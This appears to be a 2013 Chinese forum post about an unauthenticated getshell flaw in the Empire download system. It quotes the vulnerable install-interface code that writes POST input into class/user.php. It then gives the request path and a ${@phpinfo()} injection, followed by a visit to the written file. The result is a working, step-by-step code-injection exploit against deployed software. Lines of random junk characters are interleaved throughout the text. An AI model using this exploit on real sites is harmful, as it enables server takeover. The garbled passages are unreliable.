这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
' E! q! p4 i! G+ h2 l! ~+ F0 n4 |9 N9 \
- _0 u h& f; O这是帝国的一套下载系统 如图
4 ~5 l8 H. H; I( _& k) gps(不需要任何账户和密码,直接写shell)
: i$ [9 p8 `4 A, w; {由于很多站是由于下载要整合discuz 等等一些论坛....! x7 T7 ?2 j7 ], h
! D" u# Z! }. T1 K7 e! I' f9 x
而帝国他又有一个万能接口,如图
" P) u9 f/ H/ R. ^' O
" t+ E( x! a$ S) l9 r( k7 p
( l1 @! ~! l5 q" B1 V, z而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
; I! e8 V7 _& L) r! F* u0 B0 ` f6 [. c+ L
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
9 D% T6 y1 f$ b1 L9 E
5 K+ z; F; H; Z' }8 e4 M在data/fun.php中的15行7 F& V3 v- L3 J! s( b5 E
0 r0 V, k& k4 l; l" \
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {3 I$ I4 Z- r( y( m, f3 C
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干/ O6 o8 W. N% c/ r# K+ ^
* W. c# r j9 m5 O7 T
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);9 f6 B5 W! x& R$ v% @" P
0 y2 F: ~4 C$ Q: n0 V: ?6 K2 e
他将传进来的变量进行了切割,然后赋给了$filetext- R: Y! v8 t; Z2 h1 ?
2 n, _ | M% M8 c0 k+ U% |) U然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了7 Z* O O$ b: i: w/ k9 H
. Y9 U+ g4 \) E" }# j' S n8 O我们看看写入的结果,随便填一个 9 c0 j& `4 q6 T7 L
5 v/ x" p5 Z1 y Y9 _1 P7 k
( [! ]" u( \/ J
/ D: y% a$ }% h3 Y7 _1 `
! W* E" r; ^; H5 e
. n8 y1 L5 I/ {! [( b. `4 T" f+ M# h _) v1 p) F* l
' ~9 C- u8 ^, D& E8 ]1 v' z
& y. X- F; @) y4 w. h
?5 B; ]5 N" L! H9 n
8 _* z: p! L4 I& t! b; W+ J- n' L! f4 X" C l8 s3 r8 M [
" x' F$ D% b; h) v
# P# v1 @ H) `& G3 s
* A2 d6 h( Q2 L* B1 l0 U9 D7 m+ [- S; H
* e* }2 [6 v `6 |, j6 x# C! \
* d ]( b" Q$ k0 e7 ?: o
% z6 B! u1 w6 l1 x% F; U" {; h7 v) P( e
: B/ L! s5 T) j- C$ E) X( l$ c" _4 Y4 R- F8 l
所以我们淫荡点,写个${@phpinfo()}试试
r& |" e- q* Q& y然后访问以下class/user.php这个文件' |, t; }2 u. k0 o& n6 w, s1 M$ i
日了吧
* J3 ` B: V+ _) |
% E9 Y0 O [2 x8 Y8 R8 n5 S. V9 G8 f/ n
1 s$ P' u; F: o g2 n5 I
, C$ h3 i: J9 C1 N* K
+ j0 ?; [$ b: S8 @9 d9 G | 
发表于 2013-1-23 09:34:37
收藏
支持
反对